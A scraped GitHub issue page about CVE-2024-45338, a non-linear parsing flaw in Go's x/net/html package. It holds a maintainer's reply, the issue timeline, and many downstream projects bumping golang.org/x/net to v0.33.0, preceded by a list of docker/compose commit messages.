c79f15da9 go.mod: golang.org/x/sys v0.22.0 3f55382ff update to go1.21.12 44337d2bb Enhance JSON progress events with more fields. bc733508d bump compose-go v2.1.5 c422b5447 bump github.com/docker/cli v27.1.0 e74441c90 bump github.com/docker/docker v27.1.0 2bac32a46 bump github.com/containerd/containerd v1.7.20 f278400fb gha: add docker 27.1.0 4f9db4d3e fix(containers): fix sorting logic by adding secondary sorting for one-off containers 06bf339a4 fix: typos 231ea1005 update docs generation to avoid man pages generation 46679150d bump compose-go to v2.1.4, buildx to v0.16.0, containerd to v1.7.19 and buildx to v0.15.0 d3d378b92 restore setEnvWithDotEnv 163cdfd31 empty env variable with no value must be unset in container 25f85938b exclude unnecessary resources after services have been selected cacbca859 change time for stale bot ecac13f27 Remove debug mode and run twice a week 14793cc2e Add stale workflow 11d5ecdc7 update docs 9549a213b feat(watch): Add --prune option to docker-compose watch command da434013e Remove COMPOSE_MENU env from e2e tests ace69c96a Use rawjson for the build backend. 2db04c1e4 Set logging format to JSON. 8f7cd0048 Format errors as JSON when in JSON progress mode. 5a6e1a7e2 Pass 'plain' instead of 'json' to build backend 06545d066 Add JSON stream progress writer 075fd9345 go.mod: docker/cli, docker/docker v27.0.3 d062ad739 gha: test against docker v27.0.3 7cd5209cc go.mod: docker/cli, docker/docker v27.0.2 f79c28168 Remove `console.Terminal` check and use `IsTerminal` from `streams.Out` Signed-off-by: Bruce Ashfield <bruce.ashfieldgmail.com>

mrco245 · 2025-02-10T19:13:19Z

so when I look at the go/src/go.mod file = in the latest release of go, it still refers to the versions of net that is failing this CVE. Is there any plans to address this?

ianlancetaylor · 2025-02-10T20:14:13Z

The Go standard library does not use the golang.org/x/net/html package, so there isn't anything to address. golang.org/x/net is there for other packages (dns, http, http2, idna, lif, nettest, route).

rolandshoemaker added the Security label Dec 18, 2024

This comment was marked as off-topic.

Sign in to view

dmitshur added the NeedsFix The path to resolution is known, but the work has not been done. label Dec 18, 2024

dmitshur added this to the Unreleased milestone Dec 18, 2024

gopherbot closed this as completed in golang/net@8e66b04 Dec 18, 2024

rolandshoemaker changed the title ~~security: fix CVE-2024-45338~~ x/net/html: non-linear parsing of case-insensitive content Dec 18, 2024

github-actions bot mentioned this issue Dec 19, 2024

Vulnerabilities detected kyverno/kyverno#11789

Closed

ckcr4lyf mentioned this issue Dec 19, 2024

Update golang.org/x/net -> v0.33.0 (CVE-2024-45338) grpc-ecosystem/grpc-health-probe#227

Closed

github-actions bot mentioned this issue Dec 19, 2024

CVE-2024-45338 ministryofjustice/hmpps-probation-integration-services#4504

Closed

FObersteiner mentioned this issue Dec 19, 2024

Dependency x/net is vulnerable srwiley/oksvg#46

Open

chrisd8088 mentioned this issue Dec 19, 2024

upgrade x/net to 0.33.0 to fix CVE git-lfs/git-lfs#5939

Closed

dannycjones mentioned this issue Dec 19, 2024

Update dependency x/net/html awslabs/mountpoint-s3-csi-driver#323

Merged

glours added a commit to glours/compose that referenced this issue Dec 19, 2024

bump golang.org/x/net to v0.33.0 to fix potential security issue

e83070c

golang/go#70906 Signed-off-by: Guillaume Lours <705411+glours@users.noreply.github.com>

glours mentioned this issue Dec 19, 2024

bump golang.org/x/net to v0.33.0 to fix potential security issue docker/compose#12405

Merged

weppos mentioned this issue Dec 19, 2024

Bump golang.org/x/net from 0.28.0 to 0.31.0 miekg/dns#1622

Merged

brianmcarey mentioned this issue Dec 19, 2024

deps: Update golang.org/x/net to v0.33.0 to resolve high vulnerability kubevirt/kubevirt#13568

Merged

8 tasks

haaag added a commit to haaag/gm that referenced this issue Dec 19, 2024

fix: bump golang.org/x/net -> v0.33.0 vulnerable CVE-2024-45338

6f3b109

Reference: - [CVE-2024-45338](GHSA-w32m-9786-jp63) - [x/net/html: non-linear parsing of case-insensitive content golang/go#70906](golang/go#70906)

mbobrovskyi mentioned this issue Dec 19, 2024

Bump golang.org/x/net v0.31.0 to v0.33.0. kubernetes-sigs/kjob#19

Merged

chrisd8088 mentioned this issue Dec 20, 2024

Upgrade golang.org/x/net from 0.23.0 to 0.33.0 git-lfs/git-lfs#5940

Merged

github-actions bot mentioned this issue Dec 20, 2024

Vulnerabilities detected kyverno/kyverno#11796

Closed

dims mentioned this issue Dec 20, 2024

[CVE-2024-45338] Non-linear parsing of case-insensitive content in golang.org/x/net/html kubernetes/kubernetes#129347

Closed

github-actions bot mentioned this issue Dec 21, 2024

Vulnerabilities detected kyverno/kyverno#11805

Closed

This was referenced Dec 22, 2024

Vulnerabilities detected kyverno/kyverno#11806

Closed

Vulnerabilities detected kyverno/kyverno#11807

Closed

Vulnerabilities detected kyverno/kyverno#11810

Closed

gg718 mentioned this issue Dec 24, 2024

[CVE-2024-45338] Update golang.org/x/net to v0.33.0 imroc/req#409

Closed

This was referenced Dec 25, 2024

Vulnerabilities detected kyverno/kyverno#11812

Closed

Vulnerabilities detected kyverno/kyverno#11813

Closed

Vulnerabilities detected kyverno/kyverno#11816

Closed

arjan-bal mentioned this issue Dec 27, 2024

update x/net to resolve CVE-2024-45338 grpc/grpc-go#7964

Closed

shireenf-ibm mentioned this issue Jan 2, 2025

bump golang.org/x/net from v0.23.0 to v0.33.0 np-guard/netpol-analyzer#470

Merged

github-actions bot mentioned this issue Jan 3, 2025

Vulnerabilities detected kyverno/kyverno#11844

Closed

ndeloof pushed a commit to docker/compose that referenced this issue Jan 7, 2025

bump golang.org/x/net to v0.33.0 to fix potential security issue

3060ed2

golang/go#70906 Signed-off-by: Guillaume Lours <705411+glours@users.noreply.github.com>

This was referenced Feb 10, 2025

k8s.io/Apimachinery-v0.32.0: 1 vulnerabilities (highest severity is: 5.3) kubecost/cluster-turndown#114

Open

cloud.google.com/go/storage-v1.38.0: 1 vulnerabilities (highest severity is: 5.3) kubecost/golang-migrate-duckdb#12

Open

coderabbitai bot mentioned this issue Feb 10, 2025

Upgrades beatlabs/patron#834

Merged

coderabbitai bot mentioned this issue Feb 17, 2025

[v3] Late service registration and error handling overhaul wailsapp/wails#4066

Merged

15 tasks

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

x/net/html: non-linear parsing of case-insensitive content #70906

x/net/html: non-linear parsing of case-insensitive content #70906

rolandshoemaker commented Dec 18, 2024 •

edited

Loading

This comment was marked as off-topic.

gopherbot commented Dec 18, 2024

guidovranken commented Dec 20, 2024

mrco245 commented Feb 10, 2025

ianlancetaylor commented Feb 10, 2025

x/net/html: non-linear parsing of case-insensitive content #70906

x/net/html: non-linear parsing of case-insensitive content #70906

Comments

rolandshoemaker commented Dec 18, 2024 • edited Loading

This comment was marked as off-topic.

gopherbot commented Dec 18, 2024

guidovranken commented Dec 20, 2024

mrco245 commented Feb 10, 2025

ianlancetaylor commented Feb 10, 2025

rolandshoemaker commented Dec 18, 2024 •

edited

Loading